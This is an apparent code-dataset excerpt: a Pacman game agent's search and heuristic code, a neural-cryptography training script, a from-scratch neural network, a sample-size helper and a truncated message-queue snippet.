actionsInDeadEndDist.append(self.computeDistToEnemyHome(pos)[0])\n\n \n if len(distToEnemyHomeList) !=0:\n closestToEnemyHomeDist = min(distToEnemyHomeList)\n selectedActionsAtHome = [a for a,d in zip(actionsAtHome, distToEnemyHomeList) if d == closestToEnemyHomeDist]\n\n selectedActions = selectedActionsAtHome + selectedActionsInEnermy\n elif len(selectedActionsInEnermy):\n selectedActions = selectedActionsInEnermy\n else:\n closestToHomeDistInDeadEnd = min(actionsInDeadEndDist)\n selectedActionsInEnermyDeadEnd = [a for a,d in zip(actionsInDeadEnd, actionsInDeadEndDist) if d == closestToHomeDistInDeadEnd]\n selectedActions = selectedActionsInEnermyDeadEnd\n\n if len(selectedActions) != 0:\n #print('407--', random.choice(selectedActions))\n return selectedActions\n #print('408--', random.choice(selectedActions))\n else:\n return bestActions \n \n def computeDistToEnemyHome(self,pos):\n minDist = 9999\n for loc in self.frontierPointsEnemy:\n curDist = self.getMazeDistance(loc, pos)\n if curDist < 
minDist:\n                minDist = curDist\n                minDistLoc = loc\n        return minDist, minDistLoc\n\n    def min2(self, gameState, depth, playerIndex, allIndexes, isPacman):\n        bestActionValue = 9999\n        bestAction = None\n        actions = gameState.getLegalActions(playerIndex)\n        for action in actions:\n            if action != 'Stop':\n                successor = gameState.generateSuccessor(playerIndex, action)\n                nextIndex = allIndexes[0]\n                actionValue, a = self.max2(successor, depth - 1, nextIndex, allIndexes, isPacman)\n                if bestActionValue > actionValue:\n                    bestAction = action\n                    bestActionValue = actionValue\n        return bestActionValue, bestAction\n\n    def maxn(self, gameState, depth, playerIndex, allIndexes, isPacman):\n        if depth == 0 or gameState.getLegalActions(playerIndex) == None or gameState.isOver():\n            return (self.getEvaluation(gameState, allIndexes), None)\n        else:\n            playerIndexInList = allIndexes.index(playerIndex)\n            actions = gameState.getLegalActions(playerIndex)\n            actionValues = []\n            applicableActions = []\n            myPosList = []\n            for action in actions:\n                # skip the 'Stop' action\n                if action != 'Stop':\n                    successor = gameState.generateSuccessor(playerIndex, action)\n                    playerInallIndex = (allIndexes.index(playerIndex) + 1) % len(allIndexes)\n                    enermyIndex = allIndexes[playerInallIndex]\n                    actionValue, a = self.maxn(successor, depth - 1, enermyIndex, allIndexes, isPacman)\n                    myPos = successor.getAgentPosition(playerIndex)\n                    for i in range(len(actionValue)):\n                        actionValues.append(actionValue[i])\n                        applicableActions.append(action)\n                        myPosList.append(myPos)\n\n            # when the final action (depth = self.miniMaxDepth2) list is empty, return 'Stop'\n            if len(applicableActions) == 0:\n                return [(0, 0, 0)], 'Stop'\n\n            maxPlayerValue = max([valueTuple[playerIndexInList] for valueTuple in actionValues])\n\n            bestActionValueTuples = [v for a, v, p in zip(applicableActions, actionValues, myPosList) if v[playerIndexInList] == maxPlayerValue]\n            bestActions = [a for a, v, p in zip(applicableActions, actionValues, myPosList) if v[playerIndexInList] == maxPlayerValue]\n            bestActionsPos = [p for a, v, p in zip(applicableActions, actionValues, myPosList) if v[playerIndexInList] == maxPlayerValue]\n            if depth != self.miniMaxDepth2:\n                toAct = random.choice(bestActions)\n                return bestActionValueTuples, toAct\n\n            # select next action based on features (try to avoid going into a dead end)\n            if depth == self.miniMaxDepth2:\n                selectedActions = self.selectMiniMaxAction(bestActions, bestActionsPos, gameState, isPacman)\n                toAct = random.choice(selectedActions)\n\n                return [(0, 0, 0)], toAct\n\n    def isCloseToFood(self, gameState, actions):\n        foodNum = len(self.getFood(gameState).asList())\n        isClose = 0\n        for action in actions:\n            successor = gameState.generateSuccessor(self.index, action)\n            foodNumNew = len(self.getFood(successor).asList())\n            if foodNum > foodNumNew:\n                isClose = 1\n        return isClose\n\n    def evaluatePatrol(self, gameState, action):\n        \"\"\"\n        Computes a 
linear combination of features and feature weights\n        \"\"\"\n        features = self.getFeaturesPatrol(gameState, action)\n        weights = self.getWeightsPatrol(gameState, action)\n        return features * weights\n\n    def getFeaturesPatrol(self, gameState, action):\n        features = util.Counter()\n        successor = self.getSuccessor(gameState, action)\n        nextPos = successor.getAgentPosition(self.index)\n\n        myState = successor.getAgentState(self.index)\n        myPos = myState.getPosition()\n\n        global belief\n\n        # Computes whether we're on defense (1) or offense (0)\n        features['onDefense'] = 1\n        if myState.isPacman: features['onDefense'] = 0\n\n        # Computes distance to invaders we can see\n        enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]\n        invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n        features['numInvaders'] = len(invaders)\n        if len(invaders) > 0:\n            dists = [self.getMazeDistance(nextPos, a.getPosition()) for a in invaders]\n            features['invaderDistance'] = min(dists)\n\n        patrolArea = self.frontierPoints[int(len(self.frontierPoints)/2):]\n        features['distToPatrol'] = self.getDistToPatrol(myPos, patrolArea)\n\n        # distance to the belief of where the enemies are\n        distBelief = 0\n        posList = self.enemyProbPos[self.enemies[0]] + self.enemyProbPos[self.enemies[1]]\n        if posList:\n            for pos, prob in posList:\n                if pos in self.myCells:\n                    distBelief += self.getMazeDistance(myPos, pos) * prob\n            features['distToBelief'] = distBelief\n        else:\n            features['distToBelief'] = 0\n\n        return features\n\n    def getDistToPatrol(self, myPos, patrolArea):\n        if not patrolArea:\n            return 0\n        dists = sum(self.getMazeDistance(pos, myPos) for pos in patrolArea)\n        return dists / len(patrolArea)\n\n    def getWeightsPatrol(self, gameState, action):\n        return {'numInvaders': -70, 'onDefense': 100, 'distToPatrol': -10, 'invaderDistance': -20, 'distToBelief': -12}\n\n    def getSuccessor(self, gameState, action):\n        \"\"\"\n        Finds the next successor which is a grid position (location tuple).\n        \"\"\"\n        successor = gameState.generateSuccessor(self.index, action)\n        pos = successor.getAgentState(self.index).getPosition()\n        if pos != util.nearestPoint(pos):\n            return successor.generateSuccessor(self.index, action)\n        else:\n            return successor\n\n    def evaluate(self, gameState, action):\n        \"\"\"\n        Computes a linear combination of features and feature weights\n        \"\"\"\n        features = self.getFeatures(gameState, action)\n        weights = self.getWeights(gameState, action)\n        return features * weights\n\n    def getFeatures(self, gameState, action):\n        features = util.Counter()\n        successor = self.getSuccessor(gameState, action)\n        nextState = successor.getAgentState(self.index)\n        foodList = self.getFood(successor).asList()\n        nextPos = successor.getAgentState(self.index).getPosition()\n\n        # score\n        features['successorScore'] = -len(foodList)\n\n        # Compute distance to the nearest food\n        if len(foodList) > 0:  # This should always be True, but better safe than sorry\n            minDistance = min([self.getFoodDistance(nextPos, food, gameState) for food in foodList])\n            features['distanceToFood'] = minDistance\n\n        # Distance to Power Capsule\n        capsule = self.getCapsules(gameState)\n        if capsule:\n            capsuleDist = min([self.getMazeDistance(cap, nextPos) for cap in capsule])\n            features['distanceToCapsule'] = capsuleDist\n        else:\n            features['distanceToCapsule'] = 0  # since eaten\n\n        # 
Away from ghost\n ghsPosition = self.checkStateSafe(gameState)\n if ghsPosition:\n for _, pos in ghsPosition:\n features['distToGhost'] += self.getMazeDistance(pos, nextPos)\n else: \n features['distToGhost'] = 0\n\n # penalise stop\n if action == Directions.STOP: features['stop'] = 1\n\n # penalise reverse\n rev = Directions.REVERSE[gameState.getAgentState(self.index).configuration.direction]\n if action == rev: features['reverse'] = 1\n\n # invader\n enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]\n invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n if len(invaders) > 0:\n dists = [self.getMazeDistance(nextPos, a.getPosition()) for a in invaders]\n features['invaderDistance'] = min(dists)\n\n # invader number\n features['numInvaders'] = len(invaders)\n\n # isPacman\n features['isPacman'] = successor.getAgentState(self.index).isPacman\n\n # is eaten\n if ghsPosition:\n if self.mayBeEaten(nextPos, ghsPosition):\n features['isEaten'] = 1\n else:\n features['isEaten'] = 0\n\n return features\n\n def getFoodDistance(self, myPos, food, gameState):\n \"\"\"\n Force one agent to eat top food\n \"\"\"\n favoredY = self.favoredY\n return self.getMazeDistance(myPos, food) + abs(favoredY - food[1])\n\n def needToCashIn(self, myPos, nextState, maxCarry, timeLeft):\n # if we have enough pellets, attempt to cash in\n distToHome = self.distToHome[myPos]\n if distToHome:\n if nextState.numCarrying >= maxCarry or timeLeft < 2*distToHome[0]:\n return 1\n else:\n return 0\n else:\n return 0\n\n def getWeights(self, gameState, action):\n return {'successorScore': 80, 'distanceToFood': -1.8, \\\n 'distanceToCapsule': -5, 'distToGhost': 20, 'cashIn': 10, \\\n 'stop': -12, 'reverse': -2, 'invaderDistance': -1, \\\n 'numInvaders': -2, 'isPacman': 3, 'isEaten': -40}\n\n def checkStateSafe(self, gameState):\n \"\"\"\n Check if current state may be threatened by\n Returns ghost position, if none return None\n \"\"\"\n enemy = self.getEnemy(gameState)\n enemyGhost = enemy['Ghost']\n agentPos = gameState.getAgentPosition(self.index)\n nearbyGhost = []\n # check if ghost scared\n for index, pos in enemyGhost:\n dist = self.getMazeDistance(agentPos, pos)\n scared = gameState.data.agentStates[index].scaredTimer\n if dist <= 5 and scared <=2 :\n nearbyGhost.append((index, pos))\n\n if not nearbyGhost:\n return None\n return nearbyGhost\n \n def getEnemy(self, gameState): \n \"\"\"\n Returns the enemy state as a dictionary\n \"\"\"\n enemyState = {'Pacman': [], 'Ghost':[]} \n enemy = gameState.getBlueTeamIndices() if gameState.isOnRedTeam(self.index) else gameState.getRedTeamIndices()\n for index in enemy:\n eState = gameState.data.agentStates[index]\n if eState.isPacman and (eState.getPosition() != None):\n enemyState['Pacman'].append((index, eState.getPosition()))\n elif (not eState.isPacman) and (eState.getPosition() != None):\n enemyState['Ghost'].append((index, eState.getPosition()))\n return enemyState\n\n def escape(self, actions, gameState):\n \"\"\"\n Find an escape action\n \"\"\"\n vals = []\n for action in actions:\n successor = self.getSuccessor(gameState, action)\n nextPos = successor.getAgentPosition(self.index)\n features = self.getFeaturesEscape(gameState, nextPos)\n weights = self.getWeightsEscape(gameState)\n vals.append(features * weights)\n\n maxValue = max(vals)\n bestActions = [act for act, val in zip(actions, vals) if val == maxValue]\n\n return random.choice(bestActions)\n\n def getFeaturesEscape(self, gameState, nextPos):\n features = 
util.Counter()\n foodList = self.getFood(gameState).asList()\n myPos = gameState.getAgentPosition(self.index)\n features['successorScore'] = -len(foodList)\n ghsPosition = self.checkStateSafe(gameState)\n\n if ghsPosition:\n for _, pos in ghsPosition:\n features['distToGhost'] += self.getMazeDistance(pos, nextPos)\n else: \n features['distToGhost'] = 0\n if self.distToHome[myPos]:\n features['toHome'] = -1*self.distToHome[myPos][0]\n else:\n features['toHome'] = 0\n\n # is eaten\n if ghsPosition:\n if self.mayBeEaten(nextPos, ghsPosition):\n features['isEaten'] = 1\n else:\n features['isEaten'] = 0\n\n return features\n\n def getWeightsEscape(self, gameState):\n return {'successorScore': 2, 'distToGhost': 40, 'toHome': 10, 'isEaten': -40}\n\nclass DefensiveReflexAgent(ClassicPlanAgent):\n \"\"\"\n A defensive agent that keeps its side Pacman-free.\n With belief of where the pacman may be.\n \"\"\"\n \n def chooseAction(self, gameState):\n \"\"\"\n Picks among the actions with the highest Q(s,a).\n \"\"\"\n actions = gameState.getLegalActions(self.index)\n\n # INIT VARIABLES TO USE\n gstPos = self.checkStateSafe(gameState)\n myPos = gameState.getAgentPosition(self.index)\n Pacman = gameState.getAgentState(self.index).isPacman\n myState = gameState.getAgentState(self.index)\n defendFood = self.getFoodYouAreDefending(gameState).asList()\n foodLeft = len(self.getFood(gameState).asList())\n timeLeft = gameState.data.timeleft/4\n\n # Update our belief of enemies position\n for enemy in self.enemies:\n enemyPos = gameState.getAgentPosition(enemy)\n if enemyPos:\n newBelief = util.Counter()\n newBelief[enemyPos] = 1\n belief[enemy] = newBelief\n \n else:\n #self.randomWalk(enemy, gameState)\n #self.observedEnemy(enemy, gameState)\n prevState = self.getPreviousObservation()\n if prevState:\n prevEnemyPos = prevState.getAgentPosition(enemy)\n prevMyPos = prevState.getAgentPosition(self.index)\n \n if prevEnemyPos and (self.getMazeDistance(prevEnemyPos, prevMyPos) == 1) and (prevState.getAgentState(enemy).isPacman):\n newBelief = util.Counter()\n newBelief[gameState.getInitialAgentPosition(enemy)] = 1\n #print('enemy pacman busted')\n belief[enemy] = newBelief\n self.trackPosition[enemy] = []\n #print(' === 303 === updated belief of random walk', self.belief)\n # Get most probable position of enemy\n \n for enemy in self.enemies:\n maxProb = sorted(belief[enemy].values())[-1:]\n probablePosition = [(pos, prob) for pos, prob in belief[enemy].items() if prob in maxProb]\n self.enemyProbPos[enemy] = probablePosition\n #print('\\n=== 310 ===', enemyProbPos)\n\n\n \n # ACTION SENARIO : the enemy eat the Capsule,run away, tend to move to the enermy's side\n scared = gameState.data.agentStates[self.index].scaredTimer\n enemyPacmanPos = self.checkStateSafeAtHome(gameState)\n #print('308 scared', scared, enemyPacmanPos)\n if scared > 0 and enemyPacmanPos and not Pacman:\n enermyIndex = [tup[0] for tup in enemyPacmanPos]\n toAct = self.minimax(gameState, self.index, enermyIndex, False)\n #print('=== 1103 enermy eat cap ===', self.index, toAct, timeLeft, myPos)\n return toAct\n\n # ACTION SENARIO : when pacman and in enermy's side threatened by the ghost\n gstPos = self.checkStateSafe(gameState)\n \n if gstPos and Pacman:\n enermyIndex = [tup[0] for tup in gstPos]\n #depth = self.miniMaxDepth\n \n toAct = self.minimax(gameState,self.index, enermyIndex) \n #print('=== 1114 minimax ===', self.index, toAct, timeLeft,myPos) \n return toAct\n \n # === ABOUT TO LOSE SENARIO ===\n if len(defendFood) <= 
self.totalFoodNum/5:\n values = [self.evaluatePatrol(gameState, a) for a in actions]\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n bestAction = random.choice(bestActions)\n # print('=== 1123 ===', self.index, bestAction, timeLeft,myPos)\n return bestAction\n\n \n\n \n # === OFFENSIVE SENARIO ===\n if len(defendFood) > self.totalFoodNum/2 and timeLeft > 90:\n\n # CASE 1: REACHED-AN-IMPASSE SENARIO ===\n isInImpasse = self.reachedImpasse(gameState, myPos)\n if isInImpasse:\n \n values = [self.evaluateImpasse(gameState, a) for a in actions]\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n bestAction = random.choice(bestActions)\n #print('=== 1165 === impasse', self.index, bestAction, timeLeft,myPos)\n #print('\\n=== 1166 ===', enemyProbPos)\n return bestAction\n \n\n # === ABOUT-TO-WIN SENARIO ===\n if gstPos and Pacman:\n enermyIndex = [tup[0] for tup in gstPos]\n #depth = self.miniMaxDepth\n toAct = self.minimax(gameState, self.index, enermyIndex) \n #print('=== 1149 ===', self.index, toAct, timeLeft,myPos) \n return toAct\n\n if foodLeft <= 2: \n bestDist = 9999\n for action in actions:\n successor = self.getSuccessor(gameState, action)\n pos2 = successor.getAgentPosition(self.index)\n dist = self.getMazeDistance(self.start,pos2)\n if dist < bestDist:\n bestAction = action\n bestDist = dist\n #print('=== 1161 ===', self.index, bestAction, timeLeft,myPos) \n return bestAction\n\n # CASE 2: carrying enough food, go home\n goHome = self.needToCashIn(myPos, myState, self.minPelletsToCashIn, timeLeft)\n notHome = self.distToHome[myPos]\n isCloseToFood = self.isCloseToFood(gameState, actions)\n if goHome and (notHome) and (not isCloseToFood):\n dist, end = self.distToHome[myPos]\n # BFS find shortest path to home\n _, path = self.getBfsPath(gameState, end, myPos)\n toAct = path.pop(0)\n\n # check if threatened by ghost\n threatToHome = self.checkStateSafe(gameState)\n Pacman = gameState.getAgentState(self.index).isPacman\n\n # escape\n if threatToHome and Pacman:\n enermyIndex = [tup[0] for tup in gstPos]\n \n toAct = self.minimax(gameState, self.index, enermyIndex) \n #print('=== 1204 === need to cash in and threatened action', toAct) \n return toAct\n #print('=== 1205 === need to cash in and no threat action', toAct)\n return toAct\n \n\n # CASE 3: no threats and still hungry \n values = [self.evaluate(gameState, a) for a in actions]\n\n # === DEFENDIVE SENARIO ===\n else:\n values = [self.evaluateDefensive(gameState, a) for a in actions]\n\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n \n \n bestAction = random.choice(bestActions)\n #print('=== 1200 ===', self.index, bestAction, timeLeft,myPos)\n return bestAction\n\n \n\n def getWeightsImpasse(self, gameState, action):\n # Give more incentive to intercept enemy pacman\n return {'distToGstFreeEnemyAreaY': -25, 'distToGstFreeEnemyAreaX': -10, 'distToGhost': 32,\\\n 'stop': -12, 'reverse': -5, 'invaderDistance': -4, \\\n 'isPacman': -3, 'isEaten': -80}\n\n def evaluatePatrol(self, gameState, action):\n \"\"\"\n Computes a linear combination of features and feature weights\n \"\"\"\n features = self.getFeaturesPatrol(gameState, action)\n weights = self.getWeightsPatrol(gameState, action)\n return features * weights\n\n def getFeaturesPatrol(self, gameState, action):\n features = util.Counter()\n successor = self.getSuccessor(gameState, action)\n\n myState = successor.getAgentState(self.index)\n 
myPos = myState.getPosition()\n\n # Computes whether we're on defense (1) or offense (0)\n features['onDefense'] = 1\n if myState.isPacman: features['onDefense'] = 0\n\n # Computes distance to invaders we can see\n enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]\n invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n features['numInvaders'] = len(invaders)\n\n patrolArea = self.frontierPoints[:int(len(self.frontierPoints)/2)]\n features['distToPatrol'] = self.getDistToPatrol(myPos, patrolArea)\n return features\n\n def getWeights(self, gameState, action):\n return {'successorScore': 100, 'distanceToFood': -2.5, \\\n 'distanceToCapsule': -2, 'distToGhost': 30, 'cashIn': 0, \\\n 'stop': -15, 'reverse': -2, 'invaderDistance': -3.5, \\\n 'numInvaders': -3.5, 'isPacman': 3}\n \n def getFoodDistance(self, myPos, food, gameState):\n favoredY = abs(self.height-self.favoredY)\n return self.getMazeDistance(myPos, food) + abs(favoredY - food[1])\n\n def getDistToFriend(self, friendPos, myPos):\n favoredY = abs(self.height-self.favoredY)\n friendDist = self.getMazeDistance(myPos, friendPos)\n if friendDist <= 4:\n return friendDist + favoredY\n return favoredY\n\n ##########################################\n # BELOW IS FOR DEFENSIVE STATE #\n ##########################################\n\n def getFeaturesDefensive(self, gameState, action):\n features = util.Counter()\n successor = self.getSuccessor(gameState, action)\n\n myState = successor.getAgentState(self.index)\n myPos = myState.getPosition()\n\n # Computes whether we're on defense (1) or offense (0)\n features['onDefense'] = 1\n if myState.isPacman: features['onDefense'] = 0\n\n # Computes distance to invaders we can see\n enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]\n invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]\n\n invaderPos = [a.getPosition() for a in enemies if a.isPacman and a.getPosition() != None]\n if invaderPos:\n for inv in invaderPos:\n features['invaderDistToHome'] += -1/self.getInvaderDistToHome(inv)\n else:\n features['invaderDistToHome'] = 0\n\n features['numInvaders'] = len(invaders)\n\n if len(invaders) > 0:\n dists = [self.getMazeDistance(myPos, a.getPosition()) for a in invaders]\n features['invaderDistance'] = min(dists)\n\n if action == Directions.STOP: features['stop'] = 1\n rev = Directions.REVERSE[gameState.getAgentState(self.index).configuration.direction]\n if action == rev: features['reverse'] = 1\n\n # dist to pacman\n pacmanProbIn = self.beliefInPacmanPosition(gameState)\n features['ToFoodCluster'] = self.getMazeDistance(pacmanProbIn, myPos)\n\n return features\n \n def defendTheCluster(self, gameState):\n foodList = self.getFoodYouAreDefending(gameState).asList()\n bigClusterFood = []\n for food1 in foodList:\n clusterSize = 0\n for food2 in foodList:\n if self.getMazeDistance(food1, food2) <= 3:\n clusterSize += 1\n bigClusterFood.append((food1, clusterSize))\n \n return bigClusterFood\n\n def beliefInPacmanPosition(self, gameState):\n \"\"\"\n Returns a position that our ghost should patrol\n \"\"\"\n enemyDist = []\n positionToPatrol = []\n myPos = gameState.getAgentPosition(self.index)\n enemyPacmanPosition = self.getEnemy(gameState)['Pacman']\n cluster = self.defendTheCluster(gameState)\n minDist = 999\n if enemyPacmanPosition:\n for idx, pos in enemyPacmanPosition:\n curDist = self.getMazeDistance(pos, myPos)\n if minDist > curDist:\n minDist = curDist\n minPos = pos\n return minPos\n\n else:\n 
allDist = gameState.getAgentDistances()\n enemyDist = []\n for idx in self.enemies:\n enemyDist.append(allDist[idx])\n\n myPos = gameState.getAgentPosition(self.index)\n for c, size in cluster:\n for dist in enemyDist:\n CI = range(dist-4, dist+4)\n if self.getMazeDistance(c, myPos) in CI:\n positionToPatrol.append((c, size))\n if positionToPatrol:\n patrol = sorted(positionToPatrol, key = lambda x: x[1])[-1]\n\n else:\n patrol = sorted(cluster, key = lambda x: x[1])[-1]\n #('=== 596 ===', patrol[0])\n return patrol[0]\n\n\n def getInvaderDistToHome(self, invaderPos):\n dist = [self.getMazeDistance(enemyhome, invaderPos) for enemyhome in self.frontierPointsEnemy]\n return sum(dist)/len(dist)\n\n def evaluateDefensive(self, gameState, action):\n \"\"\"\n Computes a linear combination of features and feature weights\n \"\"\"\n features = self.getFeaturesDefensive(gameState, action)\n weights = self.getWeightsDefensive(gameState, action)\n return features * weights\n\n def getSuccessorDefensive(self, gameState, action):\n \"\"\"\n Finds the next successor which is a grid position (location tuple).\n \"\"\"\n successor = gameState.generateSuccessor(self.index, action)\n pos = successor.getAgentState(self.index).getPosition()\n if pos != util.nearestPoint(pos):\n # Only half a grid position was covered\n return successor.generateSuccessor(self.index, action)\n else:\n return successor\n\n def getWeightsDefensive(self, gameState, action):\n return {'numInvaders': -70, 'onDefense': 100, 'invaderDistToHome': 30, 'invaderDistance': -20, \\\n 'stop': -100, 'reverse': -3, 'ToFoodCluster': -15}\n","sub_path":"myTeam2.5.py","file_name":"myTeam2.5.py","file_ext":"py","file_size_in_byte":58142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247953002","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport time\nimport os\n\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\n\n\n# In[2]:\n\nfrom argparse import ArgumentParser\nfrom model import CryptoNet\nfrom config import *\n\n\n# In[3]:\n\nmsg_len = 16\n# key_len = [16, 14, 12, 10, 8, 6, 4, 2]\nkey_len = [14, 12, 10, 8, 6, 4, 2]\n\n# epochs = 1\nepochs = 15000\nbatch_size = 4096\nlearning_rate = 0.0008\n# iterations = 2000\niterations = 1\nrounds = 5\n\n\n# In[4]:\n\nfor current_key_len in key_len:\n print(\"\")\n print(\"Current key is: \", current_key_len)\n \n for i in range(rounds):\n print(\"Current round is: \", i)\n\n print(\"Record the time:\")\n print(time.strftime(\"%d_%m_%Y_%H_%M_%S\"))\n start_time = time.time()\n\n tf.reset_default_graph()\n sess = tf.Session()\n\n crypto_net = CryptoNet(sess, iterations, msg_len=msg_len, key_len = current_key_len, epochs=epochs,\n batch_size=batch_size, learning_rate=learning_rate)\n\n crypto_net.train()\n\n\n end_time = time.time()\n print(\"--- %s seconds ---\" % (end_time - start_time)) \n\n\n eve_msg_error = crypto_net.get_eve_msg_errors()\n bob_msg_error = crypto_net.get_bob_msg_errors()\n eve_error = crypto_net.get_eve_errors()\n bob_error = crypto_net.get_bob_errors()\n\n\n # filename = \"../../record/error_0\" + time.strftime(\"_%d_%m_%Y_%H_%M_%S\") + '.csv'\n # filename = \"../../record/error_1\" + time.strftime(\"_%d_%m_%Y_%H_%M_%S\") + '.csv'\n # intial\n # filename = \"../../record/error_2\" + time.strftime(\"_%d_%m_%Y_%H_%M_%S\") + '.csv'\n # with bob_output_sign and eve_output_sign\n # filename = \"../../record/error_3\" + time.strftime(\"_%d_%m_%Y_%H_%M_%S\") + '.csv'\n # with all bias terms\n filename = 
\"../../record/error_4\" + time.strftime(\"_%d_%m_%Y_%H_%M_%S\") + '.csv'\n # with all bias terms + differnt key_len\n filename = \"../../record/error_5_\" + str(current_key_len) + time.strftime(\"_%d_%m_%Y_%H_%M_%S\") + '.csv'\n\n d = {'eve_error': eve_error, 'bob_error': bob_error,\n 'eve_msg_error': eve_msg_error, 'bob_msg_error': bob_msg_error}\n data_frame = pd.DataFrame(data = d)\n data_frame.to_csv(filename)\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\"\"\"\nRead the error file\n\"\"\"\n\npre_index = ['error_0_', 'error_1_', 'error_2_', 'error_3_', 'error_4_', 'error_5_']\nroot_dir = \"../../record/\"\n\nfilename_num = 20\nitemsize = 100\n\nfilename = np.chararray((len(pre_index), filename_num), itemsize = itemsize)\nfilename_pos = np.asarray([0 for i in range(len(pre_index))])\n\n\n# In[ ]:\n\n\n\n\n# In[3]:\n\nfor i in os.listdir(root_dir):\n current_filename = root_dir + i\n \n for j in range(len(pre_index)):\n if(current_filename.find(pre_index[j]) != -1):\n filename[j][filename_pos[j]] = current_filename\n filename_pos[j] = filename_pos[j] + 1\n\n# print(current_filename)\n\n\n# In[40]:\n\nimport plotly\nimport plotly.plotly as py\nimport plotly.graph_objs as go\n\nplotly.offline.init_notebook_mode()\n\n\n# In[43]:\n\nfile_to_read = str(filename[4][1],'utf-8')\n\nprint(file_to_read)\n\n\n# In[44]:\n\n\n\nerror = pd.read_csv(file_to_read)\neve_error = np.asarray(error.eve_error)\nbob_error = np.asarray(error.bob_error)\n\nindex = np.array([i for i in range(bob_error.shape[0])])\n\ntrace0 = go.Scatter(\n x = index,\n y = bob_error,\n mode = 'lines+markers',\n name = 'bob_error'\n)\ntrace1 = go.Scatter(\n x = index,\n y = eve_error,\n mode = 'lines+markers',\n name = 'eve_error'\n)\n\ndata = [trace0, trace1]\n\nplotly.offline.iplot(data, filename='line-mode')\n\n\n# In[ ]:\n\n\n\n","sub_path":"adversarial_neural_cryptography/src/original_jupyter.py","file_name":"original_jupyter.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"122692433","text":"from functions import cross_entropy_loss_prime\nfrom functions import cross_entropy_loss\nfrom functions import ReLu, ReLu_prime, softmax, softmax_prime\nimport numpy as np\n\nclass Layer:\n def __init__(self, size:tuple, activation:tuple) -> None:\n super().__init__()\n self.weights = np.random.rand(size[1], size[0])\n self.input = np.zeros((1, size[0]))\n self.output:np.ndarray\n self.activation = activation[0]\n self.deactivation = activation[1]\n self.bias = np.ones((1, size[0]))\n def forward_propagation(self,inputs):\n self.input = inputs\n self.input = np.dot(self.input, self.weights)\n # print(self.output, \"<-- out\")\n # print(self.bias, \"<-- bias\")\n self.input += self.bias\n self.activate()\n\n def backward_propagation(self, error, learning_rate):\n print(error , \"<----err\", error.shape)\n print(self.weights , \"<----weights\", self.weights.shape)\n print(self.deriv() , \"<----deriv\", self.deriv().shape)\n print(self.output , \"<----deriv\", self.output.shape)\n\n self.weights -= learning_rate * error* np.dot(np.dot(self.weights.T , self.deriv()), self.output)\n return error * np.dot(self.weights.T , self.deriv())\n \n def activate(self):\n self.output = self.activation(self.input)\n\n def deriv(self):\n return self.deactivation(self.output)\n\n\nclass Network:\n def __init__(self, epochs, learning_rate) -> None:\n super().__init__()\n self.layers:list[Layer] = []\n self.error:np.array\n self.loss = ...\n self.loss_prime = ...\n 
self.learning_rate = learning_rate\n\n def train(self, input_data, output_data):\n\n for data in zip(input_data, output_data):\n #might be faster if 0th elemtn is done outside instead of if\n for index, layer in enumerate(self.layers):\n if index != 0:\n layer.forward_propagation(self.layers[index-1].output)\n else:\n layer.forward_propagation(np.array([data[0]]))\n #true false loss\n self.error = self.loss(data[1], self.layers[-1].output)\n self.gradient_error = self.loss_prime(data[1], self.layers[-1].output)\n\n # print(self.error)\n # print(self.gradient_error)\n\n for index, layer in enumerate(reversed(self.layers)):\n print(index, '____INDEX____')\n if index != 0:\n self.error = layer.backward_propagation(self.gradient_error, self.learning_rate)\n else:\n layer.weights -= self.learning_rate * np.dot(self.gradient_error,layer.output.T)\n self.error = np.dot(self.gradient_error, layer.output.T)\n \n # print(self.error)\n\n def add(self, layer:Layer):\n self.layers.append(layer)\n\n def use(self, loss_function, deriv_loss):\n self.loss = loss_function\n self.loss_prime = deriv_loss\n\n\nn = Network(1, 1)\nn.use(cross_entropy_loss, cross_entropy_loss_prime)\nn.add(Layer((7,4),(ReLu, ReLu_prime)))\nn.add(Layer((5,7),(ReLu, ReLu_prime)))\nn.add(Layer((3,5),(softmax, softmax_prime)))\n\ninput_data = np.array([[5.1,3.5,1.4,0.2], [6.8,3.2,5.9,2.3]])\noutput_data = np.array([[1,0,0], [0,0,1]])\n# print(zip(input_data, output_data))\nn.train(input_data=input_data, output_data=output_data)","sub_path":"NeuralNetworks/NeuralFromScratch/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"396319597","text":"# Cochran’s Sample Size Formula\nfrom Calculator.Multiplication import multiplication\nfrom Calculator.Division import division\nfrom Calculator.Squared import squared\n\n\n# = ((Z-Value)^2 * (p) * (q)) / (e)^2\n\ndef cochran(z, p, q, e):\n try:\n z = float(z)\n p = float(p)\n q = float(q)\n e = float(e)\n\n num1 = z * z\n num2 = p * q\n num3 = e * e\n num4 = num1 *num2\n result = round(num4 / num3)\n return result\n\n except ZeroDivisionError:\n print('Error! Cannot divide by 0')\n except ValueError:\n print('Error! Invalid data inputs')\n\n\n\n# Z,p,q,e,Sample\n# 1.96,0.5,0.5,0.05,384\n\n\n# num1 = 3.8416\n# num2 = 0.25\n# num3 = 0.0025\n# num4 = 0.9604\n# return = 384.16\n","sub_path":"PopulationSampling/CochransFormula.py","file_name":"CochransFormula.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349984282","text":"#!/usr/bin/env python\nimport pika\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters(host='localhost'))\n\nchannel = connection.channel()\n\nchannel.exchange_declare(exchange='event',\n 